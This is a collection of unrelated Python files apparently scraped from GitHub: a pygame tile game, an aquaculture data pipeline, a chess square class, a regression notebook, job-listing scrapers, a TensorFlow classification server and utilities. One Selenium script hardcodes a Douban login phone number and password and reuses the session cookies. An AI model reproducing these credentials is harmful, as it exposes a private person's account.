turn = 'PLAYER'\n\n #playground.Button.draw(theBoard.surf)\n\n\n while running and computer and player and bag :\n\n if turn == 'COMPUTER':\n theBoard.scoreBoard(len(computer), 15, 33, 'Adversaire',screen)\n theBoard.scoreBoard(len(player), 215, 33, 'Moi',screen)\n pygame.display.flip()\n\n computerIA(gameMatrix, computer, minX, maxX, minY, maxY,75)\n turn = 'PLAYER'\n\n screen.fill(BACKGROUNDCOLOR)\n screen.blit(theBoard.surf, theBoard.playGround)\n mousePos = pygame.mouse.get_pos()\n\n for event in pygame.event.get():\n for playerBlock in player:\n if event.type == MOUSEBUTTONDOWN and playerBlock.block.collidepoint(mousePos) and not captured:\n playerBlock.setFocus(True)\n captured = True\n pygame.mouse.set_pos(playerBlock.getPos())\n elif event.type == MOUSEBUTTONDOWN and playerBlock.focus and captured:\n captured = False\n playerBlock.setFocus(False)\n #rectif the x and y position only on the board\n if theBoard.boardTable.collidepoint(mousePos):\n\n xRectif = playerBlock.rectifPos(mousePos[0])\n yRectif = playerBlock.rectifPos(mousePos[1])\n\n canBeValidate = True\n # can not overlap a block on the board\n for blockBoard in board:\n if playerBlock.block.colliderect(blockBoard.block):\n canBeValidate = False\n\n if canBeValidate:\n #validation\n\n if validationBlock(gameMatrix,playerBlock,transScreenPosMatPosX(xRectif),transScreenPosMatPosY(yRectif)):\n playerBlock.setPosXRectif(xRectif)\n playerBlock.setPosYRectif(yRectif)\n board.append(playerBlock)\n addToMatrix(gameMatrix, playerBlock)\n player.remove(playerBlock)\n turn = 'COMPUTER'\n #play sound\n\n pygame.mixer.Sound.play(soundPlayerOk)\n pygame.mixer.music.stop()\n\n else:\n 
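# the drop was not accepted onto the board, so the block simply stays\n # at the current mouse position and keeps following the cursor\n 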
playerBlock.setPosX(mousePos[0])\n playerBlock.setPosY(mousePos[1])\n\n playerBlock.block.x = playerBlock.getPosX()\n playerBlock.block.y = playerBlock.getPosY()\n\n elif event.type == pygame.KEYDOWN and playerBlock.focus:\n # Check if the key pressed is 'r'\n if event.key == pygame.K_r:\n playerBlock.rotate()\n playerBlock.setFocus(True)\n captured = True\n\n elif event.type == MOUSEMOTION and playerBlock.focus:\n playerBlock.motionByMouse(event.rel)\n\n elif event.type == MOUSEBUTTONDOWN and \\\n not captured and not arrowCaptured and theBoard.buttonUp.collidepoint(mousePos):\n arrowCaptured = True\n\n elif event.type == MOUSEBUTTONUP and \\\n not captured and \\\n theBoard.buttonUp.collidepoint(mousePos) and \\\n arrowCaptured:\n arrowCaptured = False\n moveAllSpriteBoard('U', board)\n\n elif event.type == MOUSEBUTTONDOWN and \\\n not captured and not arrowCaptured and theBoard.buttonDown.collidepoint(mousePos):\n arrowCaptured = True\n\n elif event.type == MOUSEBUTTONUP and \\\n not captured and \\\n theBoard.buttonDown.collidepoint(mousePos) and \\\n arrowCaptured:\n arrowCaptured = False\n moveAllSpriteBoard('D', board)\n\n elif event.type == MOUSEBUTTONDOWN and \\\n not captured and not arrowCaptured and theBoard.buttonLeft.collidepoint(mousePos):\n arrowCaptured = True\n\n elif event.type == MOUSEBUTTONUP and \\\n not captured and \\\n theBoard.buttonLeft.collidepoint(mousePos) and \\\n arrowCaptured:\n arrowCaptured = False\n moveAllSpriteBoard('L', board)\n\n elif event.type == MOUSEBUTTONDOWN and \\\n not captured and not arrowCaptured and theBoard.buttonRight.collidepoint(mousePos):\n arrowCaptured = True\n\n elif event.type == MOUSEBUTTONUP and \\\n not captured and \\\n theBoard.buttonRight.collidepoint(mousePos) and \\\n arrowCaptured:\n arrowCaptured = False\n moveAllSpriteBoard('R', board)\n\n elif event.type == MOUSEBUTTONDOWN and not captured and \\\n theBoard.buttonAdd.collidepoint(mousePos) and \\\n not arrowCaptured and not addBlock:\n addBlock = True\n\n blocksInBag = bag.getNumberBlock()\n randomBlockId = random.randint(0, blocksInBag - 1)\n tempoBlock = bag.getBlock(randomBlockId)\n posInPlayerTable = findFreeSpace()\n tempoBlock.setPosX(posInPlayerTable[0])\n tempoBlock.setPosY(posInPlayerTable[1])\n player.append(tempoBlock)\n blocksGroup.add(tempoBlock)\n bag.removeBlock(tempoBlock)\n pygame.mixer.Sound.play(soundTake)\n pygame.mixer.music.stop()\n turn = 'COMPUTER'\n tempoBlock.redraw()\n pygame.mixer.Sound.play(soundPlayerNok)\n pygame.mixer.music.stop()\n\n elif event.type == MOUSEBUTTONUP and not captured and \\\n theBoard.buttonAdd.collidepoint(mousePos) and \\\n not arrowCaptured and addBlock:\n addBlock = False\n\n elif event.type == QUIT:\n running = False\n\n\n #END FOR PLAYER\n #END FOR EVENT\n\n for block in board:\n if block.lastIaPlayed:\n if time.time() - block.lastRefreshScreen > 0.3:\n block.lastRefreshScreen = time.time()\n block.hide = not block.hide\n block.redraw()\n if time.time() - block.lastPlayedTime > 5:\n block.lastPlayedTime = False\n block.hide = False\n block.redraw()\n\n # Draw the player on the screen\n for entity in blocksGroup:\n screen.blit(entity.surf, entity.block)\n\n #END FOR\n\n\n theBoard.scoreBoard(len(computer),15,33,'Adversaire',screen)\n theBoard.scoreBoard(len(player),215,33,'Moi',screen)\n\n\n\n # Update the display\n pygame.display.flip()\n\n clock.tick(FPS)\n\n # END WHILE\n\n if not computer:\n rect = pygame.Rect(SCREEN_WIDTH / 2 - 200, SCREEN_HEIGHT / 2 - 300, 50, 50)\n\n endGame = 
pygame.image.load('./assets/you_lose.png')\n endGame = pygame.transform.scale(endGame, (400, 200))\n\n # surface.blit(self.icon, self.rect)\n screen.blit(endGame, rect)\n pygame.display.flip()\n # pygame.display.flip()\n\n pygame.mixer.Sound.play(soundGameOver)\n pygame.mixer.music.stop()\n\n time.sleep(4)\n\n\n\n if not player:\n\n rect = pygame.Rect(SCREEN_WIDTH / 2 - 200, SCREEN_HEIGHT / 2 - 300, 50, 50)\n\n endGame = pygame.image.load('./assets/you_win.png')\n endGame = pygame.transform.scale(endGame, (400, 200))\n\n # surface.blit(self.icon, self.rect)\n screen.blit(endGame, rect)\n pygame.display.flip()\n # pygame.display.flip()\n\n pygame.mixer.Sound.play(soundWin)\n pygame.mixer.music.stop()\n time.sleep(4)\n\n if not bag:\n rect = pygame.Rect(SCREEN_WIDTH / 2 - 200, SCREEN_HEIGHT / 2 - 300, 50, 50)\n\n endGame = pygame.image.load('./assets/game_over.png')\n endGame = pygame.transform.scale(endGame, (400, 200))\n\n # surface.blit(self.icon, self.rect)\n screen.blit(endGame, rect)\n pygame.display.flip()\n # pygame.display.flip()\n time.sleep(4)\n\n #END __MAIN__\n","repo_name":"EXM699/kromino","sub_path":"kromino.py","file_name":"kromino.py","file_ext":"py","file_size_in_byte":22431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9780591149","text":"import pandas as pd\nimport os\n\nimport functions_file_preparation as ffprep\nimport variables\n\n# create and move to directory for raw files that will be merged. \nos.chdir(os.path.dirname(__file__))\nos.chdir('../data/')\n\n# download data\nurl = 'https://www.fao.org/fishery/static/Data/Aquaculture_2022.1.1.zip'\nffprep.write_from_url(url, 'Aquaculture_2022.1.1.zip')\n\n# extract and cleanup\nffprep.unzip_and_cleanup('Aquaculture_2022.1.1.zip', 'Aquaculture_Raw')\n\n\n# load in both the quantity (mass) of fish raised with the value in USD\nfish_quantity = pd.read_csv(\"./Aquaculture_Raw/Aquaculture_Quantity.csv\")\n#fish_value = pd.read_csv(\"./Aquaculture_Raw/Aquaculture_Value.csv\")\n\n\n# merge these two \n# fish_quant_value = pd.merge(fish_quantity, fish_value, how = 'outer',\n# on = ['PERIOD', 'COUNTRY.UN_CODE', 'SPECIES.ALPHA_3_CODE', 'AREA.CODE', 'ENVIRONMENT.ALPHA_2_CODE'])\n\n# rename columns\n# fish_quant_value.rename(columns = {'VALUE_x': 'Quantity', 'VALUE_y': 'ValueUSD'}, inplace = True)\nfish_quantity.rename(columns = {'VALUE': 'Quantity'}, inplace = True)\n\n# replace the NaN (which are created due to blank values) with \"OFF\" for OFFICIAL\n# fish_quant_value['STATUS_x'].fillna(\"OFF\", inplace = True)\n# fish_quant_value['STATUS_y'].fillna(\"OFF\", inplace = True)\nfish_quantity['STATUS'].fillna(\"OFF\", inplace = True)\n \n \n# use function to merge codelist files \nfish_quantity = ffprep.merge_codelist_files(fish_quantity, \"./Aquaculture_Raw/CL_FI_COUNTRY_GROUPS.csv\", \n [\"UN_Code\", \"Name_En\"], \"COUNTRY.UN_CODE\", \"Country\")\n\nfish_quantity = ffprep.merge_codelist_files(fish_quantity, \"./Aquaculture_Raw/CL_FI_WATERAREA_GROUPS.csv\", \n [\"Code\", \"Name_En\"], \"AREA.CODE\", \"WaterArea\")\n\nfish_quantity = ffprep.merge_codelist_files(fish_quantity, \"./Aquaculture_Raw/CL_FI_PRODENVIRONMENT.csv\", \n [\"Code\", \"Name_En\"], \"ENVIRONMENT.ALPHA_2_CODE\", \"Environment\")\n\nfish_quantity = ffprep.merge_codelist_files(fish_quantity, \"./Aquaculture_Raw/CL_FI_SPECIES_GROUPS.csv\", \n [\"3A_Code\", \"Name_En\", \"Scientific_Name\"], \"SPECIES.ALPHA_3_CODE\", \"Species\")\n\nfish_quantity = ffprep.merge_codelist_files(fish_quantity, 
\"./Aquaculture_Raw/FSJ_UNIT.csv\", [\"Code\", \"Name_En\"], \n \"MEASURE\", \"Measure_Unit_Quantity\")\n\n# fish_quantity = ffprep.merge_codelist_files(fish_quantity, \"./Aquaculture_Raw/FSJ_UNIT.csv\", [\"Code\", \"Name_En\"], \n# \"MEASURE_y\", \"Measure_Unit_ValueUSD\")\n\nfish_quantity = ffprep.merge_codelist_files(fish_quantity, \"./Aquaculture_Raw/CL_FI_SYMBOL.csv\", [\"Symbol\", \"Name_En\"], \n \"STATUS\", \"Statistical_Symbol_Quantity\")\n\n# fish_quantity = ffprep.merge_codelist_files(fish_quantity, \"./Aquaculture_Raw/CL_FI_SYMBOL.csv\", [\"Symbol\", \"Name_En\"], \n# \"STATUS_y\", \"Statistical_Symbol_ValueUSD\")\n\n\n# split the data into animal and non-animal\nnon_fish_quantity, fish_quantity = ffprep.split_plant_animal(fish_quantity, variables.plant_list)\n\n\n#write final merged dataframe to file\nfish_quantity.to_csv(\"Aquaculture_Quantity_Code_Merged.csv\", index = False)\nnon_fish_quantity.to_csv(\"Aquaculture_Non_Fish_Quantity_Code_Merged.csv\", index = False)","repo_name":"seenstevo/Pisciculture_EDA","sub_path":"src/utils/get_merge_fao_aquaculture_data.py","file_name":"get_merge_fao_aquaculture_data.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74238284968","text":"class InvalidSquareException(Exception):\n pass\n\n\nclass Square(object):\n u\"\"\"Represents the coordinates of any square on the chess board.\"\"\"\n\n def __init__(self, square_name=None, x=None, y=None, piece=None):\n u\"\"\"Returns the square on a chess board.\n\n square_name -- The name of the chess square\n x -- The x-coordinate of the chess square, 1-indexed, left to right\n y -- The y-coordinate of the chess square, 1-indexed, white pieces start on 1 and 2, black on 7 and 8\n piece -- A chess piece to place in this square\n\n The square can be by specifying EITHER the name of the square OR the x, y coordinates.\n If both are specified then this method raises an exception.\n \"\"\"\n if square_name is None:\n square_name = Square._nameFromCoords(x, y)\n\n else:\n if (x is not None) or (y is not None):\n raise InvalidSquareException(u\"Only square_name or x,y coords should be defined\")\n x, y = Square._coordsFromName(square_name)\n\n self.name = square_name.upper()\n self.x = x\n self.y = y\n self.piece = piece\n\n @property\n def row(self):\n return self.y\n\n @property\n def column(self):\n return chr(ord(u'A') + self.x - 1)\n\n @staticmethod\n def _nameFromCoords(x, y):\n u\"\"\"Maps x,y coordinates like A4 to x,y coordinates like (1, 4).\n\n The white player starts on rows with y values 1, and 2, while the black players pieces start on rows 7 and 8.\n x coordinates increment left to right.\n\n x -- The square from left to right\n y -- The square from bottom to top, starting from white players side\n\n Returns -- The name of the square\n Raises -- InvalidSquareException if the square is not on the chess board\n\n \"\"\"\n if 1 <= x <= 8 and 1 <= y <= 8:\n name = chr(ord(u'A') + x - 1) + str(y)\n return name\n else:\n raise InvalidSquareException(\n \"The square ({x}, {y}), does not exist on a chess board. 
X and Y must be between 1 and 8 (inclusive).\".\n format(x=x, y=y)\n )\n\n @staticmethod\n def _coordsFromName(name):\n u\"\"\"Maps square names like H6 to x,y coordinates like (8, 6)\n\n The white player starts on rows with y values 1 and 2, while the black player's pieces start on rows 7 and 8.\n x coordinates increment left to right.\n\n name -- The name of the Square\n Returns -- x, y coordinates of this square\n Raises -- InvalidSquareException if the square is not on the chess board\n\n \"\"\"\n x = ord(name[0].upper()) - ord(u'A') + 1\n y = int(name[1])\n\n if 1 <= x <= 8 and 1 <= y <= 8:\n return x, y\n else:\n raise InvalidSquareException(\n \"The square {name} does not exist on a chess board.\".format(name=name)\n )\n\n def pop(self):\n u\"\"\"Removes the current piece from this square and returns it\"\"\"\n piece = self.piece\n self.piece = None\n return piece\n\n @staticmethod\n def _isValidSquare(x, y):\n u\"\"\"Returns True if the x and y coordinates are within a chess board (both between 1 and 8).\"\"\"\n if 0 < x <= 8 and 0 < y <= 8:\n return True\n else:\n return False\n\n def isAdjacent(self, square_name):\n u\"\"\"Returns True if two squares are horizontally, vertically or diagonally adjacent (side by side).\"\"\"\n if self.name != square_name:\n x, y = self._coordsFromName(square_name)\n if abs(self.x - x) <= 1:\n if abs(self.y - y) <= 1:\n return True\n return False\n\n def direction(self, to_):\n u\"\"\"The direction from this square to to_ is normalized to have x and y components of -1, 0 or 1.\n\n Normalization keeps the ratio of the x and y components the same (so the direction is the same)\n while reducing the magnitude of the x and y components to either 1 or 0 each.\n\n to_ -- The name of another Square\n returns -- One of (1, 0), (1, 1), (0, 1), (-1, 1), (-1, 0), (-1, -1), (1,-1),\n or None if the vector cannot be reduced to one of these\n \"\"\"\n to_square = Square(to_)\n x = to_square.x - self.x\n y = to_square.y - self.y\n\n if x == 0:\n y = y / abs(y)\n elif y == 0:\n x = x / abs(x)\n elif abs(x) == abs(y):\n x = x / abs(x)\n y = y / abs(y)\n else:\n # Can't be normalized (ratio)\n return None\n return (x, y)\n","repo_name":"CheyneWilson/chess","sub_path":"chess/square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":4671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35521712209","text":"\n# coding: utf-8\n\n# In[ ]:\n\n\nimport glob\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime, timedelta\n\n\n# In[ ]:\n\n\ndef create_Summary(project,row):\n \n project['sentDate'] = pd.to_datetime(project['sentDate'],format='%Y-%m-%d %H:%M:%S.%f')\n \n project = project[project['sentDate'].notnull()]\n project = project.sort_values('sentDate')\n \n df = pd.DataFrame()\n df.loc[row,'Project'] = project['projectId'][project.index[0]]\n\n project.groupby('fromOrganizationId')\n df.loc[row,'Number_of_Organizations'] = len(project.groupby('fromOrganizationId').count())\n \n df.loc[row,'Project_Duration'] = int((project['sentDate'][project.index[-1]] - project['sentDate'][project.index[0]]).days)\n\n project.groupby('fromUserId')\n df.loc[row,'Number_of_Users'] = len(project.groupby('fromUserId').count())\n\n project.groupby('correspondenceTypeId')\n df.loc[row,'Kinds_Of_Correspondence'] = len(project.groupby('correspondenceTypeId').count())\n \n df.loc[row,'Number of mails'] = len(project)\n\n return df\n\n\n# In[ ]:\n\n\n# Reading all the .csv files into one\n#path 
=r'C:\\Users\\212342133\\Documents\\Python Scripts\\1_Exploration\\Aconex\\Data+science+-+test+(June+2017)\\Data science - test (June 2017)\\correspondence_data'\nallFiles = glob.glob(\"*.csv\")\n\n\n# In[ ]:\n\n\nframe = pd.DataFrame()\nlist_ = []\nfor index,file_ in enumerate(allFiles):\n df = pd.read_csv(file_, index_col=None, header=0)\n df = create_Summary(df,index)\n list_.append(df)\nframe_summary = pd.concat(list_)\n\n\n# In[ ]:\n\n\nframe_summary.to_excel('frame_summary.xlsx',index=False)\n\n\n# In[ ]:\n\n\nframe_summary = pd.read_excel('frame_summary.xlsx')\n\n\n# In[ ]:\n\n\nframe_summary.describe\n\n\n# In[ ]:\n\n\nimport seaborn as sns\nget_ipython().magic('matplotlib inline')\n\n\n# In[ ]:\n\n\nsns.heatmap(frame_summary.corr())\n\n\n# In[ ]:\n\n\nsns.jointplot(x='Project_Duration',y='Kinds_Of_Correspondence',data=frame_summary)\n\n\n# In[ ]:\n\n\nsns.pairplot(frame_summary)\n\n\n# In[ ]:\n\n\nframe_summary.head()\n\n\n# In[ ]:\n\n\nimport sklearn\nfrom sklearn.preprocessing import MinMaxScaler\n\nscaler = MinMaxScaler()\n\n\n# In[ ]:\n\n\nframe_summary[['Number_of_Organizations','Project_Duration','Number_of_Users','Kinds_Of_Correspondence','Number of mails']] = scaler.fit_transform(frame_summary[['Number_of_Organizations','Project_Duration','Number_of_Users','Kinds_Of_Correspondence','Number of mails']]) \n\n\n# In[ ]:\n\n\nframe_summary.head()\n\n\n# In[ ]:\n\n\nsns.pairplot(frame_summary)\n\n\n# In[ ]:\n\n\nframe_summary_sorted = frame_summary.sort_values('Project_Duration', ascending=False)\nframe_summary_top = frame_summary_sorted[2000:]\n#sns.pairplot(frame_summary_top)\nsns.heatmap(frame_summary_top.corr())\n\n\n# In[ ]:\n\n\nframe_model = frame_summary.drop('Project', 1)\nframe_model_X = frame_model.drop('Project_Duration',1)\nframe_model_y = frame_model['Project_Duration']\n\n\n# In[ ]:\n\n\nframe_model.head()\n\n\n# In[ ]:\n\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(frame_model_X, frame_model_y, test_size = 0.3, random_state = 1)\n\n\n# In[ ]:\n\n\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.model_selection import cross_val_score\n\n\n# In[ ]:\n\n\ncross_val_score(regressor, X_train, y_train, cv=10)\n\n\n# In[ ]:\n\n\n# - -------\n\n\n# In[ ]:\n\n\nfrom sklearn.svm import SVR\nfrom sklearn import metrics\n\nregressor = SVR(kernel = 'rbf')\nregressor.fit(X_train,y_train)\n\n\n# In[ ]:\n\n\n# Training Error\npredictions = regressor.predict(X_train)\nprint('MAE:', metrics.mean_absolute_error(y_train, predictions))\nprint('MSE:', metrics.mean_squared_error(y_train, predictions))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_train, predictions)))\n\n\n# In[ ]:\n\n\n# Prediction Error\npredictions = regressor.predict(X_test)\nprint('MAE:', metrics.mean_absolute_error(y_test, predictions))\nprint('MSE:', metrics.mean_squared_error(y_test, predictions))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, predictions)))\n\n\n# In[ ]:\n\n\nfrom sklearn.tree import DecisionTreeRegressor\n\ndtree = DecisionTreeRegressor()\ndtree.fit(X_train,y_train)\n\n\n# In[ ]:\n\n\n# Training Error\npredictions = dtree.predict(X_train)\nprint('MAE:', metrics.mean_absolute_error(y_train, predictions))\nprint('MSE:', metrics.mean_squared_error(y_train, predictions))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_train, predictions)))\n\n\n# In[ ]:\n\n\n# Prediction Error\npredictions = dtree.predict(X_test)\nprint('MAE:', metrics.mean_absolute_error(y_test, predictions))\nprint('MSE:', 
metrics.mean_squared_error(y_test, predictions))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, predictions)))\n\n\n# In[ ]:\n\n\nfrom sklearn.ensemble import RandomForestRegressor\nforest = RandomForestRegressor(n_estimators=1000)\nforest.fit(X_train,y_train)\n\n\n# In[ ]:\n\n\n# Training Error\npredictions = forest.predict(X_train)\nprint('MAE:', metrics.mean_absolute_error(y_train, predictions))\nprint('MSE:', metrics.mean_squared_error(y_train, predictions))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_train, predictions)))\n\n\n# In[ ]:\n\n\n# Prediction Error\npredictions = forest.predict(X_test)\nprint('MAE:', metrics.mean_absolute_error(y_test, predictions))\nprint('MSE:', metrics.mean_squared_error(y_test, predictions))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, predictions)))\n\n\n\n","repo_name":"abhinavy8011/aconex","sub_path":"Aconex.py","file_name":"Aconex.py","file_ext":"py","file_size_in_byte":5275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10460424159","text":"# simulate a douban login with selenium\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport requests\nfrom fake_useragent import UserAgent\n\ndriver = webdriver.Chrome(executable_path='/home/bc/桌面/chromedriver')\ndriver.get('https://douban.com')\n# implicit wait, so that the page can finish loading\ndriver.implicitly_wait(10)\ndriver.find_element_by_id('form_email').send_keys('18518753265')\ndriver.find_element_by_id('form_password').send_keys('ljh123456')\ndriver.find_element_by_class_name('bn-submit').click()\nprint(driver.get_cookies())\n\ncookie_str = ''\nfor cookie in driver.get_cookies():\n print(type(cookie))\n cookie_str += cookie['name']+'='+cookie['value']+'; '\n\nua = UserAgent()\nprint(cookie_str[:-2])\nheaders = {\n 'User-Agent':ua.chrome,\n 'cookie':cookie_str,\n}\n\n\n# driver = webdriver.Chrome(executable_path='/home/bc/桌面/chromedriver')\n# driver.get('https://weibo.com')\n# # implicit wait, so that the page can finish loading\n# driver.implicitly_wait(10)\n# driver.find_element_by_id('form_email').send_keys('')\n# driver.find_element_by_id('form_password').send_keys('')\n# driver.find_element_by_class_name('bn-submit').click()\n\n","repo_name":"hanfang302/Webcrawler","sub_path":"爬虫基础/模拟登录.py","file_name":"模拟登录.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12504805261","text":"import time\nimport os\nimport json\nimport requests\nfrom bs4 import BeautifulSoup\nuserAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36'\nheaders = {\n 'User-Agent':userAgent\n}\nurl = 'https://www.104.com.tw/jobs/search/?keyword=資料分析師&page=%s'\nfor i in range(0,10):\n res = requests.get(url%(i), headers = headers)\n soup = BeautifulSoup(res.text, 'html.parser')\n jobs = soup.select('div[class=\"b-block__left\"]')\n for job in jobs:\n try:\n pre_new_url = job.select('a[class=\"js-job-link\"]')[0]\n aa = str(pre_new_url[\"href\"]).split('b/')[1].split('?')[0]\n new_url = f'https://www.104.com.tw/job/ajax/content/'+aa\n new_headers = {\n 'User-Agent':userAgent,\n 'Referer': f'https://www.104.com.tw/job/'+aa\n }\n new_res = requests.get(new_url, headers = new_headers)\n job_content = new_res.json()\n print(\"===========================職缺============================\")\n print(job_content['data']['header']['jobName'])\n print(job_content['data']['header']['custName'])\n 
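# the ajax content endpoint answers with JSON; the free-text description\n # of the posting sits under data.jobDetail.jobDescription, printed below\n 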
print(\"-------------------------工作項目---------------------------\")\n print(job_content['data']['jobDetail']['jobDescription'])\n print('網址: https://www.104.com.tw/job/'+aa+'\\n')\n except :\n print(\"\")\n print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~next page')\n\n\n\n\n\n","repo_name":"annchenrz/work","sub_path":"104_job.py","file_name":"104_job.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26097178954","text":"from behave import *\nfrom pages.ServiciosPage import ServiciosPage\n\n\n@when(u'Click en boton eliminar')\ndef step_impl(context):\n try:\n ServiciosPage.ClickBotonEliminar(context)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Click en boton eliminar\"\n\n\n@when(u'Confirmar Baja')\ndef step_impl(context):\n try:\n ServiciosPage.ConfirmarBaja(context)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Confirmar Baja\"\n\n\n@then(u'Validar baja servicio')\ndef step_impl(context):\n try:\n ServiciosPage.ValidateToastBajaServicio(context)\n context.driver.close()\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Validar baja servicio\"\n","repo_name":"MarcosIannello/AutomationBDD_Python_selenium","sub_path":"TestAutomation/features/steps/ServicioBaja.py","file_name":"ServicioBaja.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5499044586","text":"#!/usr/bin/env python\n# usage: bash tf_classify_server.sh [PORT_NUMBER]\nfrom flask import Flask, request\nimport tensorflow as tf\nimport label_image as tf_classify\nimport json\napp = Flask(__name__)\nFLAGS, unparsed = tf_classify.parser.parse_known_args()\nlabels = tf_classify.load_labels(FLAGS.labels)\ntf_classify.load_graph(FLAGS.graph)\nsess = tf.Session()\n@app.route('/', methods=['POST'])\ndef classify():\n try:\n data = request.files.get('data').read()\n result = tf_classify.run_graph(data, labels, FLAGS.input_layer, FLAGS.output_layer, FLAGS.num_top_predictions, sess)\n return json.dumps(result), 200\n except Exception as e:\n return repr(e), 500\napp.run(host='127.0.0.1',port=12480 if len(unparsed) == 0 else int(unparsed[0]))\n\n","repo_name":"hiveml/simple-ml-serving","sub_path":"tf_classify_server.py","file_name":"tf_classify_server.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"53"} +{"seq_id":"7493873257","text":"import pickle\nimport os\nimport random\nimport numpy as np\nimport torch\nimport argparse\nimport matplotlib.pyplot as plt\n\nLOG2PI = 0.5 * np.log(2 * np.pi)\n\nclass AttrDict(dict):\n\n __setattr__ = dict.__setitem__\n __getattr__ = dict.__getitem__\n\ndef setup_seed(seed):\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n random.seed(seed)\n torch.backends.cudnn.deterministic = True\n\ndef select_gpus(gpus=\"0\"):\n '''\n gpus -> string, examples: \"0\", \"0,1,2\"\n ''' \n os.environ['CUDA_VISIBLE_DEVICES'] = gpus\n\ndef step_loader(dataloder):\n data = iter(dataloder)\n while True:\n try:\n x = next(data)\n except:\n data = iter(dataloder)\n x = next(data)\n yield x\n\ndef nats2bits(nats):\n return nats / np.log(2)\n\ndef bits2nats(bits):\n return bits * np.log(2)\n\ndef pickle_data(data, filename):\n with open(filename, 'wb') as f:\n pickle.dump(data, f)\n\ndef 
load_pkl(filename):\n with open(filename, 'rb') as f:\n return pickle.load(f)\n\ndef create_dir(folder):\n if not os.path.exists(folder):\n os.makedirs(folder)\n\ndef save_npz(filename, d):\n np.savez_compressed(filename, **d)\n\ndef load_npz(filename):\n data = np.load(filename)\n return {k : v for k, v in data.items()}\n\ndef save_gif(filename, video, fps=10):\n \"\"\"\n save the input video to gif\n filename: String\n video: ndarray with shape [T, H, W, C]\n \"\"\"\n import moviepy.editor as mpy\n clip = mpy.ImageSequenceClip([video[i]for i in range(video.shape[0])], fps=fps)\n clip.write_gif(filename, verbose=False, logger=None)\n\ndef random_move(input_folder, target_folder):\n \"\"\"randomly move a file from input folder to target folder\"\"\"\n filename = random.choice(os.listdir(input_folder))\n os.system(f'mv {os.path.join(input_folder, filename)} {os.path.join(target_folder, filename)}')\n\ndef expert_build(max_index):\n \"\"\"rename expert traj in current path and only maintain max_index number of traj\"\"\"\n file_list = sorted(os.listdir('.'))\n file_list.reverse()\n for i, filename in enumerate(file_list):\n if i < max_index:\n target_file = 'expert_traj_{}_501.npz'.format(i)\n os.system(f'mv {filename} {target_file}')\n else:\n os.system(f'rm {filename}')\n\ndef get_config_type(v):\n if isinstance(v, list):\n return lambda x : list(map(int, x.split(',')))\n if isinstance(v, bool):\n return lambda x: bool([False, True].index(int(x)))\n return type(v)\n\ndef parse_args(config={}):\n parser = argparse.ArgumentParser()\n for k, v in config.items():\n parser.add_argument(f'--{k}', type=get_config_type(v), default=v, help=f'default : {v}')\n args = parser.parse_args()\n return args\n\ndef tsplot(ax, data, **kw):\n \"\"\"plot with std shade\"\"\"\n x = np.arange(data.shape[1])\n est = np.mean(data, axis=0)\n sd = np.std(data, axis=0)\n cis = (est - sd, est + sd)\n ax.fill_between(x, cis[0], cis[1], alpha=0.2, **kw)\n ax.plot(x, est, **kw)\n ax.margins(x=0)\n\ndef show_grad(x, net):\n out = net(x)\n if not isinstance(out, torch.Tensor):\n out = out.mode()\n out.backward(torch.ones_like(out))\n img = x.grad[0].permute(1, 2, 0).numpy()\n img = np.abs(img)\n img = img / np.max(img)\n plt.imshow(img)\n plt.show()","repo_name":"IcarusWizard/GEM","sub_path":"gem/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70791053288","text":"import os\nimport pytest\nimport ezdxf\nBASEDIR = 'integration_tests' if os.path.exists('integration_tests') else '.'\nDATADIR = 'data'\n\n\n@pytest.fixture(params=['Leica_Disto_S910.dxf'])\ndef filename(request):\n filename = os.path.join(BASEDIR, DATADIR, request.param)\n if not os.path.exists(filename):\n pytest.skip('File {} not found.'.format(filename))\n return filename\n\n\ndef test_leica_disto_r12(filename):\n # new entity system: legacy mode not necessary\n dwg = ezdxf.readfile(filename, legacy_mode=False)\n msp = dwg.modelspace()\n points = list(msp.query('POINT'))\n assert len(points) == 11\n assert len(points[0].dxf.location) == 3\n","repo_name":"DatacloudIntl/dc_ezdxf","sub_path":"integration_tests/test_leica_disto_r12.py","file_name":"test_leica_disto_r12.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41040814902","text":"# -*- coding:utf-8 